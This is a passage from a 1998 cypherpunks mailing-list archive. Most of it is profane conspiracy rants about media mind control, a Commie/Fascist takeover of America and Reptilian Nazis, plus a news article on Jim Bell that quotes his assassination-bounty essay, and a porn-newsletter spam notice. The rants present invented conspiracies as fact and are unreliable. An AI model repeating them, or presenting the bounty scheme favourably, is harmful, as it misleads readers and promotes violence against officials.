circuit with all of the Movers&Shakers around the globe, no matter
what their schtick was, but wasn't smart enough to figure out all of
that stuff on his own, and besides, he was pretty busy counting his
money, and that's why he paid the I.S.P.'s GodLess Commies to figure
out the best way to put the BullShitVic Schtick up the butts of the
masses via the medium of the media of Radiating Radio Waves.
  The Radio Project's GodLess Commies didn't have much money to count,
so it didn't take them long to figure out the obvious, which is that
you don't fuck with a winning game. So they figured that 'abolution
of culture' could be accomplished by making intellectual content of
the medium as close to zero as possible, and that they could 'determine
the new cultural forms' of the listeners by Pavlovian repetition which
would eventually lead to the listeners drooling on command.
  Of course, as always, the increasing 'alienation of the population' 
remained important, since people with a strong sense of belonging in
a family, community, social structure, etc., still had a picture of
their BoyFriend by their beside, figuratively speaking.
  The techniques to make people increasingly 'radio-minded' was to 
reach it's epitome in later years, with the invention of the TV-tray,
which enabled families to abandon any pretense, whatsoever, of their
family ties being stronger than their imaginary bond to Lucille Ball
and Ricky Ricardo. [WAS: Fuck mom! I LOVE LUC!]

  It was no coincidence that one of Franklin Delanor Roosevelt's main
avenues of application of Madison Avenue Plain Folk Imagery was his
FireSideChats on the medium which had become a RichCommieFeller tool
for seizing the hearts and minds of the masses.
  After all, FDR owed much of his power and success to Elanor knowing
whose ear to blow into in the Eclectic Communist Community of the day.
  The main difference between the Bolshoi Political Ballet in Russia, 
and the Communist TakeOver Of America, was that there was no need to
remove the heads of the politicians in power and the capitalist Money
Mongers, because the politicians and the MoneyMongers *were* the head
of the Commie/Fascist TakeOver Of America.


* To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed
       Remailer)
* Subject: A Thousand Points Of Fight (fwd)
* From: Jim Choate <ravage@ssz.com>

Forwarded message:
> From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
> Subject: A Thousand Points Of Fight

> federal government. Communism now represents a threat to no one in
> the United States, while federal tyranny represents a threat to
> EVERONE.

An all powerful federal government IS communism. Communism is the 
political theory that property ownership and management must be 
centralized under a single authority. While our current state is 
moving more toward a fascist approach, private ownership & central 
mananagement, with the increasingly extensive federal management of 
private business & behaviour. 


  See, I told you so...

An Exercise For The Reader #487:
  Call up an international arms dealer and tell HimOrHer that you 
need some guns and tanks, and stuff, to start a war or a revolution,
and that you don't have any money, but you'll pay HimOrHer after you
win.

  Right...
  The Movers&Shakers (TM) don't fall for the old GoodLeader/BadLeader
crap that is pushed to the public. They have a foot in the door of
all of the major players backrooms and merely switch their 'allegiance'
to one or another of the players once the final outcome of the game
becomes obvious.
  Neither Lenin nor Hitler borrowed money from 'dad' to start their
war/revolution. They got the money from the ever-present SugarDaddies
who have adopted children scattered all over the globe. 

  Likewise, SugarDaddy's BigKids in the Military and Intelligence
Agencies may fight among themselves over who sits on SugarDaddy's
knee, but when those outside the family start butting in, then 
the CIA and the Mafia, for instance, call a truce to take care of 
family business.
  SugarDaddy loves his GoodKids and BadKids equally...

  Neither do the BigKids in SugarDaddy's CorporateEmpires let petty
little details like wars that their own children are fighting interfere
with BusinessAsUsual.
 ("Be careful out there, son, we just sold the Nazis ball-bearings
  for their tanks, through Brazil of course, after you bombed their
  ball-bearing factories.
  "Here's some extra spending cash for next time you get leave. ou've
  earned it..")


* To: Cypherpunks <cypherpunks@ns.minder.net>
* Subject: Re: A Thousand Points Of Fight (fwd)
* From: Frederick Burroughs <riburr@shentel.net>
* Sender: owner-cypherpunks@Algebra.COM
       
Jim Choate wrote:

> An all powerful federal government IS communism. Communism is the 
> political theory that property ownership and management must be 
> centralized under a single authority. While our current state is 
> moving more toward a fascist approach ,private ownership & central 
> mananagement, with the increasingly extensive federal management of 
> private business & behaviour. 

Indeed, Marx's final stage of classless society, "from each according 
to their ability to each according to their needs", implies a level of 
government management that was all but impossible during his lifetime. 
The technology required for this level of management now exists, and 
is being implimented.
"Classless society" has been achieved, not by the dissolution of 
classes, but by the development of technology to a level that can 
assign each individual into his own class. Technology now allows the 
optimum utilization of each individual by the state. 
Loners can voice their objections at the US Capitol...


  Fast Freddy 'Son of Speed' Burroughs illustrates that paying the
extra few bucks for a priority connection to the ClueServer pays off,
in the long run.
  He recognizes that somewhere, in an underground bunker, a Reptilian
Nazi is humoring his ScaleOfTen buddies by using the latest in secret
lavoratory developed technology to create a cross-clone being that
has the MindOfMarx, the BallsOfHitler, and the LipsOfGeorgeBush, 
which are intoning, "We *have* the technology!"

  All this shit was in 'The Xenix Chainsaw Massacre' in 1989, but
hardly anybody knew what the fuck was being talked about.
 (I could insert quotes that illustrate this, except I don't have
any copies of it, since ThievingFuckingMountieCriminalPricks stole
my computers, which is why I am in the middle of fucking them so
bad that they will never be the same, afterwards. I was minding my
own business, sitting at home telling the Truth over the InterNet,
when they decided they just had to fuck with me, so fuck them in
thier dirty, crimininal little assholes...)

  Anyway, what TXCSM said, in a nutshell, was that the success of
TotalWorldDomination being achieved by the Controllers was merely
dependent on development of the right tools, and tweaking them, and
that TV and the InterNet were the right tools.
  WebWorld & The Mythical Circle of Eunuchs was just written as a
fun look at a possible FutureTimeLine&SpaceWave, since The Xenix
Chainsaw Massacre had already said everything that needed to be
said, if one chose to listen.
  InfoWar was written mostly as a cross-communication tool between
Circle of Eunuchs Gorilla Cells, keeping one another updated on
each other's progress.
  Space Aliens Hide My Drugs is just a rambling, nonsensical diatribe
that results when you finally snap, and decide that any Reptilian
Nazi that fucks with you is going to be repaid in Spades, perhaps
even Aces&Eights, since I am playing with a deck that is a little
*too* full, if you know what I mean.

  Regardless, to get back to answering the question that Declan, 
GodLessSchill of the TrilateralCPU, asked, about why I send this
crap to the CypherPunks...it is because those who make this list
their home instinctively know what I have been preaching since
1989--and no doubt some of them have been preaching it since
long before that--the InterNet is going to be the Final Frontier
of the Battle for Freedom and Privacy between the Controllers
and the Citizenry.

  The CypherPunks understand: 
"THE (TM) *have* the technology."

  WeTheSheeple have been getting their asses kicked on the
Frontiers of Rights & Freedoms, without even seeming to 
realize, for the most part, that they are in a fight.
 
Fresh From The ClueServer:
  Even the Nazis didn't start the CattleCars openly rolling 
to the Auschwitz Spa & Resort until they were in a position 
of total control.
  It is *not* OK that the government is taking away our rights
and freedoms, as well as our means to defend ourselves against
them, because they are *our* government, because they are the
GoodGuys, because they have GoodIntentions, because they are
only FuckingUsALittleBit(ForNow), because we are *comfortable*
and ThingsAren'tReallyAllThatBad(et)...

  Think about what *you* have done, personally, to guarantee
the continuation of your rights and freedoms.
  Think about whether you deserve any rights or freedoms.
(es, *deserve*...they ain't, contrary to popular opinion,
 free for the taking...)

  Think about why the government continues a WarOnDrugs which
has been completely ineffective in stopping drug use, in the
least, and has only resulted in the imprisonment of more of
our citizens than the most evil of dictators that the RoyalWe
point our fingers at, as well as high crime rates, and the
wholesale slaughter of our youth.
  Could it be because the government knows exactly what they
are doing, and *desire* these results? Good Guess!!!
  The same goes for the majority of the ills and evils that
are part and parcel of the road that our political leaders 
have led us willingly down. They are no more a mistake than
the technology of Radio and TeleVision being directed towards
mindless drivel, mass hypnosis and social control programming.

  While WeTheSheeple sell our souls, our independence, our 
rights and freedoms, for the comfort and security of being 
spoon-fed our reality, while being 'protected' from the
GreatEvils that the Controllers have promoted or invented
in both our MeatSpace and our MindSpace, They (TM) have
been busy little beavers, butchering minds and lives in a
quest to gain an extra inch, here or there, in the battle
for the minds of all of humanity.

  I want you to all rise from your chairs, open your windows,
and scream, as loud as you can,
  "I've got a DICK, and I'm not afraid to use it!"

  Well, OK, maybe that's not such a good idea, but you know
what I'm talking about, eh?

Anthrax - Smoke 'em if you got it...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Jul 1998 06:04:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Jim Bell Rage
Message-ID: <199807261304.JAA14297@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Received from anonymous July 26, 1998:

The Columbian (Oregon), No date.

Written by John Branton, Columbian staff writer

Eleven months in prison - and counting - haven't muzzled
James Dalton Bell's rage about what he calls government
"black operations" against him. "This story has more
government misbehavior than Watergate", Bell wrote in a
recent letter to The Columbian.

He added in a phone call"I'm in a little bit of danger.
These people don't want me talking to you."

Bell is the 39-year-old McLoughlin Heights man who wrote
an Internet essay, "Assassination Politics", that
proposed the bounty-driven murder of "government
slimeballs". The former electronics engineer hadn't
spoken to The Columbian for about a year, until recently.
He was released from federal prison in April.

Bell served 11 months after pleading guilty to using
false Social Security numbers and obstructing the
Internal Revenue Service by trying to intimidate agents
and stink bombing their Vancouver office. Bell returned
to his parents' home this spring but was free only
about two months. Currently, Bell is back in a federal
prison in Seattle, awaiting a July 31 hearing on charges
that he violated his probation conditions. He's alleged
to have refused a court-ordered mental-health evaluation
and search of his parents' home.

Who is this man, many people have asked, who lives in our
midst when he isn't in prison - and if the IRS is to be
believed, dabbled with things such as nerve gas, botulism
toxin and sodium cyanide? IRS agents say Bell published a
"hit list" of agents' home addresses on the Internet for
his anti-government "patriot" friends, and discussed
contaminating water supplies with a buddy.

Is IRS Inspector Jeff Gordon correct in comparing Bell to
Timothy McVeigh and Theodore Kaczynski and saying the IRS
interrupted him in plans to commit murder? No, says Bell. 

"They knew I wasn't planning to kill federal agents",
Bell said this month. "They were scared because I had
written something that shows a way to eliminate
government. They were afraid I could convince the public
that I could replace existing government for no more than
a 10th or 20th of its current cost."

His wariness of the federal government is understandable
- they put him in prison. But his words reveal a view of
governmental duplicity like the fictional world of X-
Files agents Mulder and Scully. "Paranoid would be a good
word", said Bell's federal probation officer, Matthew
Richards. Bell, asked why he doesn't obey his court-
ordered probation terms to stay out of prison, made a
reference to the political imprisonment of Nelson
Mandela, South Africa's president. "I believe that when
the federal government decided to spy on me, simply
because of my political opposition to their tyranny and
terrorism, it dramatically diverged from what the average
American citizen would be inclined to tolerate", Bell
wrote recently.

Beginning in late 1995 or early 1996, Bell said, federal
agents read his "Assassination Politics" essay, posted on
the Internet. The essay described a computerized system
to ward "untraceable digital cash" to anyone who
correctly predicted the exact time of a federal agent's
murder. In Bell's words, "Imagine for a moment that, as
ordinary citizens were watching the evening news, they
see an act by a government employee or officeholder that
they feel violates their rights, abuses the public's
trust or misuses the powers that they feel should be
limited. What if they could go to their computers, type
in the miscreant's name, and select a dollar amount. If
0.1 percent of the population, or one person in a
thousand, was willing to pay $1 to see some government
slimeball dead, that would be in effect, a $250,000
bounty on his head."

Alarmed, Bell says, federal agents used two homes near
his parent's home, one on Corregidor Road and the other
on Mississippi Drive, for a clandestine and possibly
illegal surveillance operation. Agents supposedly
installed thousands of dollars worth of sophisticated

equipment, possibly using microwave technology, to spy on
Bell. "None of that occurred", said federal probation
officer Richards. "Absolutely not true", said the owner
of one of the houses. "I wouldn't let the feds in my
house."

Bell said he suspects the agents bugged his phone
illegally - and followed him when he got out of prison
briefly in April. "We never bugged his phone", Richards
said. "No tailing whatsoever". Once, Bell said, he
spotted someone following him and turned the tables on
them. Bell followed the car to Rixen's Enterprises, 2700
N. Hayden Island Drive, which he suspects is a secret
front for a federal "black operation".

"No spooks here", said the owner, Jim Rixen, 40, who said
he deals in heating systems for boats and recreational
vehicles. "I've had this company for 13 years. You can
ask anybody on this island. You're more than welcome to
come here and go through everything I've got. He might
have followed some customer of mine here. I've never
heard anything about it."

In his upcoming hearing in the U.S. District Court in
Tacoma, the government will charge Bell with additional -
so far undisclosed - probation violations, Richards said.
If Bell has any actual evidence of illegal practices by
the government, that would be the place to bring it up.

=end of article=






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sun, 26 Jul 1998 05:16:39 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Nympho Spice/I was bonked on the golf course
Message-ID: <19980726104909.1894.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/26/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sun, 26 Jul 1998 11:30:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: TruthChapter - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C9C11.75915C20.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain



TruthChapter -- SPACE ALIENS HIDE M DRUGS!!!
_____________________________________________

    OK, so it's a slow day and you don't have much going on.

  our sister is out of town for the weekend, your dog is
on the rag and your Visa is maxed-out. Thus, sex is not a
viable option for killing a little spare time (now a felony).

So what the hell...
  ou're going through the posts to the CypherPunks list and
you notice that the asshole who forged posts to the list in
your name (claiming that fucking two nine year-olds is just
as legal as fucking an 18 year-old) has spammmed yet another
chapter of the rambling, semi-coherent saga "The True Story
Of The InterNet" to the list.
  ou've read bits and pieces of the manuscripts (on company
time), every now and again (more out of boredom than because
of any socially or coupon redeeming content), and it bothers
you that the Author has taken concepts, themes and issues
that are important to you and put a bizarre, insane/inane
twist on them that somehow degrades and defiles them, in
spite of the fact that he sometimes supplies a remarkable
amount of documented facts and viewpoints from 'respectable
sources' in support of his vague claims and wild-eyed
theories.

    ou take great care to avoid being 'caught' reading the
manuscripts by others and you wouldn't dream of admitting
in public that you view them as anything but mindless
trash, but you keep finding yourself thinking about some
of the underlying views expressed by the Author of the
manuscripts.
    ou've begun to realize that what troubles you about
the 'True Story Of The InterNet' manuscripts is reflective
of what bothers you about the InterNet, in general, as a
Medium/Message--the ongoing battle between order and chaos
that reins supreme within a Virtual Reality where Jane and
Joe Average can avail themselves of the same technology as
Established Authority (TM) in the battle for your attention.

  Ms. Information Highway is a Eunuch who embodies the
divergent and seemingly contradictory yin/yang qualities
that would result from a cross-cloning of Walter Cronkite
and the BlondeBimbo that everyone tells the jokes about.
  It's like the 'science' of UFOlogy...the 'experts' in
the field often provide a well-documented trail of facts
and figures from recognized sources and authorities. The
problem, of course, is that the facts and figures are
used to 'prove' a wide range of Plausible Theories (TM)
ranging from highly-evolved beings with a superior
intelligence to humans, to Reptilian Nazis living deep
within the bowels of Mother Earth who are cultivating
SurfaceDwellers such as ourselves to provide a FoodFarm
for Alien GreyHound Tourists passing through on their
way to another galaxy.


  The Problem (TM) posed by the InterNet is Taoist in
Nature.
  The Total Access To All Information which is inherent
in the Physical Manifestation Of Virtual Reality which
we know as the InterNet opens a Dangerous Door Of
Perception leading to an environment within which we
have the possibility of being...free!
  The Freedom represented by Unrestricted Access To
Information comes from having the ability to exercise
one of the most basic of all human qualities, which is
to 'seek' knowledge in our quest for an expanding
evolutionary wisdom. The Freedom is to be able to
Search for Knowledge according to one's own personal
predilictions and desires, and to Choose from All
Available Information/Knowledge what one will use
as tools in building one's Perceived Reality.

  In a world where we have become accustomed to being
spoon-fed the information, perceptions and viewpoints
which comprise our Perceived Reality (by Officially
Recognized Authority), we suddenly find ourselves
faced with the possibility of using the technological
tools of the InterNet to direct our Attention/Perception
along vectors of our own choosing, rather than being
subjected to forced herding into the fenced pastures
and feeding pens designed by the Controllers to keep
us in an environment which is the most suitable and
convenient for their purposes.


  The Freedom is freedom from a Reality created and
governed by Official Government Pamphlets handed to us
in every area of our life.
  The Freedom is the freedom to peruse the colored charts
and diagrams provided by the Pentagon to lead us through
a maze where Gulf War Syndrome is an imaginary being that
is always just around the corner, and then to direct our
attention to the private WebSite of a Gulf War Vetran
who provides the details of his personal experience in
regard to the war and its effect on his or her life and
health.
  The Freedom is the freedom to read the wildly rambling,
nonsensical diatribes contained in the 'True Story Of The
InterNet' manuscripts and say, "Bullshit! I'm going to
check these wild-eyed claims out for myself."
  The Freedom is freedom to chaff and winnow the original
Seed Of Knowledge in a manner that suits your desires, and
to seek out InterNet venues and personas which make your
Quest for Knowledge more complete or efficient. The
Freedom is the freedom to change the direction or the
parameters of your Quest for a specific reason, or on a
momentary whim, solely to view your Perceived Reality
from the outside, in order to get a more objective view
of the WorldReality you have constructed.

  It is in this spirit that the 'TruthChapter' is being
dedicated.


    TruthChapter FAQ
    ----------------
1. What you are currently reading is *not* the TruthChapter.
2. The Author has not written, and has no intention of
  writing, the TruthChapter.
3. The Author is full of shit! Regardless of the ultimate
  level of personal and professional ethics that the Author
  brings to the manuscripts that pass through his or her
  space-time continuum of MuseDom, his or her attitudes,
  facts, figures, beliefs, values, etc., are completely
  irrelevant to your path in life, except to the extent
  that you, personally, evaluate and apply the concepts
  and ideas expressed for your consideration.
4. Writing the TruthChapter is *your* job! This is true
  whether you choose to participate in the activity which
  is described below in 'An Exercise For The Reader', or
  whether you choose to curl up in bed with Playboy, Time,
  The Wall Street Journal, Beer and Bloating In Lost Wages,
  or A Physically Manifested Expression Of Mind To Be
  Named Later.

=============================

TruthChapter FAQ Intermission

  Make some popcorn, grab a beer, and think about the
following...

  At some point in 'InfoWar - Part III of the True Story
Of The InterNet', there was a statement, quote, or some
reference documented reference to the Fact (TM) that,
during a period when violent crime statistics showed a
significant 'decrease' in violent crimes, that public
perception viewed violent crime as being very much on
the 'increase' (and a 'growing' problem).
  The reader of the manuscript has no way of personally
knowing whether the Author is passing along real, existing
facts and/or information in this regard, whether he or
she is lying in order to promote a private agenda, or
whether the Author dreamed or imagined the 'information'
during drunken drug-withdrawal seizures.
  The same concept holds true even if you can verify
through personal research that the fact/information came
from an established, respectable, documented source.
(i.e. - "Oswald acted alone." / "We, the jury, find
 OJ Simpson 'not guilty'." / "We, the 'civil jury', find
 OJ Simpson 'guilty'." / "We, the Court Of Public Opinion,
 made up our minds long before the trial began." /
 "The Mormon Tabernacle Choir acted alone..." )

  My point?
  The Author makes no bones about being a drunken, insane,
drug-addicted, infantile pervert. The fact that past and
present Presidents, Dictators, Titans of Industry, Media
Moguls, Religious Leaders, Politicians, etc., etc., ad
infinitum, choose to claim that they smoked pot but didn't
inhale, that they drank liquor but never swallowed, that
they had sex but didn't cum...
  Well, the bottom line is, "ou pays your money, you takes
your chance."

  Although the reality of the time-space continuum requires
that we develop structures and processes by which we can
navigate life's diverse paths, delegating many of our
daily thoughts, feelings and activities to pre-programmed
reactions and responses that are based on our previous
experience and analysis of life, we can never truly escape
the reality that 'Life is a crapshoot' and that failure to
exercise our capacity for conscious awareness results in
our becoming submerged in a robotic humanity/persona which
leaves us vulnerable to automatically travelling along the
path of least resistance.
  Our being Real (TM) is not a question of 'truthfully'
answering our employer's question in regard to our opinion
on the Vietnam war, whether our employer is the Pentagon
or the Peace Coalition. Gurdjieff once said that in one's
inner life, one is free to say, 'The King is shit!', but
in one's outer life, it is often wise to say, 'All hail
the King!'. Our being Real (TM) is mostly a question of
being aware of the difference between our inner and our
outer lives.

  My definition of a 'truthful' person is one who does
not lie to others more than he or she lies to oneself,
except as necessary.
  As far as when it is 'necessary' to lie, and what it
is 'necessary' to lie about...that is a matter of personal
conscience for every individual. It is dependent on one's
personal wisdom and understanding, as well as on their
beliefs and values in life.
(i.e. - It is up to each individual to decide whether
 they are comfortable with lying when the Gestapo ask
 if they are hiding Jews in the attic.)

  In a world where there is increasing pressure to conform
completely to a constantly narrowing societal paridigm, it
is important to resist sinking into a primordal swamp of
group consciousness that submerges our individual creative
spirit, or spark of life.
  I regard it as an absolute anathema to the human spirit
that opinions of OJ's guilt or innocence is split so
radically along racial lines, far beyond what differences
in social exposure and experience alone would dictate
among people of thought and reason.
  Everyone who was present when Nicole Simpson and Ronald
Goldman were murdered, raise your hand...
  Although it is encumbent upon us, in our daily lives, to
judge ourself and our life based on the best possible
information, to the best of our ability, we too often tend
to do so from a perspective of a biased, angry mob outside
of the courtroom, than from a perspective of a juror sworn
to high standards of objectivity in viewing our own life
and our personal knowledge/belief systems.

  The tragedy of the OJ trial was that the blatant racism,
corruption and lack of professional ethics of those who
are employed to be objective, unbiased investigators made
it impossible for an objective juror to place a man's fate
in the hands that gathered the evidence.
  The tragedy of life's trials is that there is so much
intrigue and subterfuge in our environment, as a result
of private and group agendas driven by human weaknesses
and character defects, that it is now a monumental task to
analyze and evaluate the information we receive, in order
to feel confident in our ability to structure our beliefs
and pre-programmed reactions and feelings in a manner that
will allow us to feel our spiritual integrity has remained
intact during the process.


  The point I am leading up to is that it is difficult,
yet exceedingly important, to overcome our human foibles
and our tendency to become robotic Sheeple in the present
societal environment which puts great pressure upon us
to abandon freedom of thought and spirit, in the interest
of the comfort of conformity.
  We live in a society where we are required by law and
custom to nod our belief and approval when our elected
political leader says, "Read my lips...no new taxes!",
even though there is not a person on the face of the
earth who doesn't understand it is a meaningless lie.
  It doesn't matter whether it is the political arena,
the religious arena, the media, the press, the justice
system, or whatever--The Lies Flow Like Water! We have
become so numbed by the assault on the Truth that it is
an easy task merely to fall into a deep slumber where
we cease resisting the constant attacks on our inherent
sensibility and our desire for increased knowledge and
wisdom.

  Gurdjieff posited that it is 'impossible' for a human
to 'consciously do evil'.
  Although the truth of this is most easily seen in the
group descent into unthinking madness that was epitomized
by the rise and fall of the Third Reich, I believe that
it is equally true in the smaller areas of daily life,
where we learn to robotically 'fool' ourselves, often
in the interests of survival, into believing that it is
Right, instead of merely Expedient, to believe that
requiring certain ethnic groups to sit at the back of
the bus is 'the way it is', instead of consciously
maintaining awareness that it is Wrong, if that is our
true personal feeling and belief.

  It is my belief that Right & Wrong (TM) have little
or no meaning without a Conscious Objective Awareness
that can only result from an individual having the
freedom to explore all of the information and experience
that life has to offer, without unreasonable, intrusive
censorship from various elements of their environment.
  Which brings us back to...the TruthChapter...

=============================


TruthChapter FAQ (continued)
----------------------------
5. The Medium Is The Message... The information that comes
  into our range of perceptive attention is shaped, shaded
  and molded in a manner dependent upon the medium of
  communication by which it is transmitted.
   This is true whether the Information is transmitted by
  genetics, analog or digital emmissions, is a moving and
  flowing energy, or is captured in a static, stable form.
  Fish find their way back to their birthplace by a different
  method than humans because of the difference in the mediums
  by which they receive the necessary information.
6. Salmon don't have to show a passport to an armed fish
  representing the Stream Government. Salmon don't have to
  have approval of the Church of Salmon in order to spawn.
  Salmon don't get a ticket for swimming on the wrong side
  of the stream, or for swimming too fast.
   Big fish eat little fish...in one gulp. They don't nibble
  them to death with Fish Taxes. They don't drown them at
  the stake for believing the earth is round. Fish are not
  as 'smart' or 'creative' as humans--they do not mentally
  build Empires out of Imaginary Sand Castles In The Sky
  and then eat each other in an argument over what color
  to paint the walls.
7. If Salmon could write, they would probably write a FAQ
  with Facts, instead of embellishing the information with
  vague, semi-rational references that seem to be putting
  a confusing spin on their World Of Perceived Reality for
  no other reason than fear of falling off if it ceases
  turning.
<EOFAQ>


  OK, so instead of using the TruthChapter FAQ to provide
you with accurate, unbiased information with which to
construct your own WorldView (TM), I ended up getting a
little carried away, using my Substance Abuse Enhanced
Creativity (TM) to try to suck the reader into a WorldView
constructed by myself for the sole purpose of making it
the Reader's turn to buy the next round of drinks.
  Although you might regard this as merely another 'proof'
of my freely admitted diabolicallity (don't bother looking
it up in the dictionary), it is my contention that you are
only fooling yourself if you are of the belief that you
can take the facts/opinions of *anyone* at face value,
without asking questions such as:
  "Had Saint Peter already signed a BookDeal with a Bible
   publisher before authoring the Epistles which he asks
   us to take as fact, based on Faith?"
  "Did Moses have inside information that there were vast
   reserves of oil in the Promised Land?"
  "Did Job belong to an S&M cult?"
  "Was St. John the Divine 'on something' when he had his
   'Revelation' <snicker-snicker>?"
  "When Jesus performed his 'miracles', did he work with
   scantily clad, sexy assistants, in order to divert the
   attention of the crowd?"

  The point I am trying to make is that, even in the arena
of religious belief, there is a difference between Faith
and a Lobotomy. Likewise in the arenas of Politics, Family,
Business, Sports and Relationships.
  For example:
"WaterGate FAQ" by Richard Nixon
"Curfew Time FAQ" by our Mom & Dad
"MicroSoft FAQ" by Saint William Gates
"Sports FAQ" by Jimmy the Greek & Marge Shott
"Relationship FAQ" by A Pregnant Woman Who Claimed To Be
                   On The Pill And Now Demands ou Marry Her
"TruthChapter FAQ" by A Cheap Drunk To Be Named Later


  In the interests of using the True Story Of The InterNet
manuscripts as a vehicle to increase the Reader's ability
to analyze and evaluate the proffered 'information' in a
manner that utilizes the evolving technological tools of
the medium by which the manuscripts are being disseminated,
the Author is making freely available the information with
which he was planning to generate/construct a chapter with
the title, 'son of The Mother Of All Chapters'.
  By providing the Reader with the information gleaned from
the InterNet for constructing the 'son of The Mother Of All
Chapters', as well as revealing HisOrHer's secret designs
and hidden agendas culminating in the final, manifested
form of the chapter, the Author is offering you, the highly
esteemed Reader of the 'True Story Of The InterNet', an
opportunity to InterActively Participate in the process of
the construction of your personal News & Entertainment
Paridigm.

  The reality of the time-space continuum dictates that we
must apply our time and resources in gathering and analyzing
the information by which we construct our WorldView in a
manner that best utilizes the tools at our disposal to
shape, color and mold available information, including
taking advantage of the MiniPre-Fab Realities that are
offered to us by our fellow RealityBuilders.
  Although Manufacturing Reality can be done with greater
quality control and efficiency through the sharing of
our individual Reality Products, basic economics dictates
that there are often HiddenCosts associated with believing
RealityAdvertising claims that something is 'free', in
the overall scheme of things.
  There is little difference between being a HeatedSpoonFed
Heroin Addict and in being a SpoonFed News/Information/
Entertainment Junkie. Once you are hooked, the price goes
up, and you end up on Information Welfare and still having
to steal your own integrity in order to pay an increasing
price for a diluted/cut product, in order to feed your
habit/need with an inferior product.
  The TruthChapter is being presented as an opportunity
to explore the possibility of weaning yourself to a
realistically supportable level of addiction to incoming
information in order to strike a balance between suffering
the pangs and arrows of outrageous fortune, in the course
of your evolution, and becoming Irrevocably Comfortably
Numb through overuse of the current OpiateOfTheMasses.

  Despite the fact that the inspiration for the process of
completing 'son of The Mother Of All Chapters' was largely
the result of the Author having his computers and notes
stolen by Officially Recognized Authorities (TM), as well
as HimOrHer descending into a depressing, primordial pit
of dysfuntional drug withdrawal, this does not, in reality,
automatically preclude the possibility that the LoftyGoals
professed by the Author in regard to the purpose of the
TruthChapter *could* be true...


An Exercise For The Reader:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Read 'Son.doc' in order to familiarize yourself
  with the all-too-predictable paranoid conspiracy
  theory slant that the Author had planned to put upon
  the information gathered for the assembly of the
  'son of The Mother of All Chapters'.
   The Son.doc attachment is an incomplete preliminary
  summary/first-draft of the 'son of The Mother Of All
  Chapters', as envisioned by the Author.
2. Read 'ThePlot.txt' in order to get the general gist
  of the Spin that the Author had planned to put on
  the analysis and evaluation of the information that
  had been gathered.
3. Read 'FDR.doc' and 'FDR2.doc' to familiarize yourself
  with the building blocks with which the Author had
  planned to construct 'son of The Mother Of All Chapters',
  as well as HisOrHer notes regarding HisOrHer personal
  knowledge and experience that could be added to support
  HisOrHer's personal WorldView.
4. Write the fucking chapter yourself!
5. Disseminate the chapter to whomever you please, in any
  manner you please. (e.g. - snailmail to your mom, email
  to the CypherPunks Distributed Mailing List, or as an
  email reply to those who bless you with 'Make $$$ Fast!"
  UCE/Spams.)


 "The Answer To Noise, Is More Noise!"
 ~ CypherPunks Chief SpokesPerson #238

  Fuck the Author!
  Fuck Time Magazine, The Wall Street Journal, America's
Most Wanted, Paul Harvey and A 'No Loitering' Sign To Be
Named Later!
  Write your own goddamn chapter and tell it the way that
*you* see it.

  Fuck TruthMonger! *BE* the TruthMonger.
  Put your own accurate or inaccurate spin or twist on the
'son of The Mother Of All Chapters' information base. Add
to it with items gleaned from your own research, or from
your own personal accumulated knowledge and experience.
  Throw all of the provided information out and completely
write the chapter from scratch, with the same theme or a
different theme.
  Write the chapter, type the chapter, or just think about
how you would approach writing the chapter in order to make
manifest the expression of the knowledge and wisdom that you
have to share with your fellow Prisoners Of A Group Reality
as to how to best break the Chains Of Free Thought wrapped
around our brains by the Reality Police.

  Don't use your physical tools merely to receive and to
retransmit Noise.
  Create Noise!

  If anyone complains or criticizes your Noise, fuck 'em!
  ou're the TruthMonger!
  ou're the Author of 'son of The Mother Of All Chapters'.

  Don't lose any sleep over the whining of ignorant pissants
who are unable or unwilling to accept the fact that your world
is flat, and that's the way GoDoG intended it to be.
  Intelligent people, like oursleves, know the world is flat.
  That's the Truth (TM).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sun, 26 Jul 1998 11:42:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Son
Message-ID: <009C9C13.311F2A20.13@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Son of Mother Of All Chapters -- SPACE ALIENS HIDE M DRUGS!!!
_________________________________________________________

July, 1948:
The moment has come when the costumes, the grease paint, the falsely

colored scenery, the technicolored spotlights and all the other artifices
of 
makeYDup should be put aside and, in the interest of truth, the solid
facts 
about the play and the players revealed to the people. 
~ The Roosevelt Myth, Preface to the Popsvox PublishingR edition 

Dec. 7, 1941
The Lake of Life has started to turn over. The bottom is rising to
the top, the 
top is descending to the bottom, and everything is becoming the opposite
of 
what it seems to be.
~ Vice-Admiral B. D'Shauneaux, USN

~~~
~~~

Version 1.7, Rev B:
Saturday morning, March 4, 1933...the conquering Democrats poured into

the city...
Only a week before an assassin's bullet had barely missed Roosevelt.
It
struck Anton Cermak, the Bohemian mayor and boss of Chicago, who with

Al Smith, had opposed Roosevelt's nomination...and died a few days
later. 

Version 2.7, Rev. 3:
On February 1, 1933, in Miami, Florida Giuseppe Zangara fired five
shots a President-elect Franklin D. Roosevelt, who was making an 
impromptu speech while sitting in an open car that had stopped momentarily.

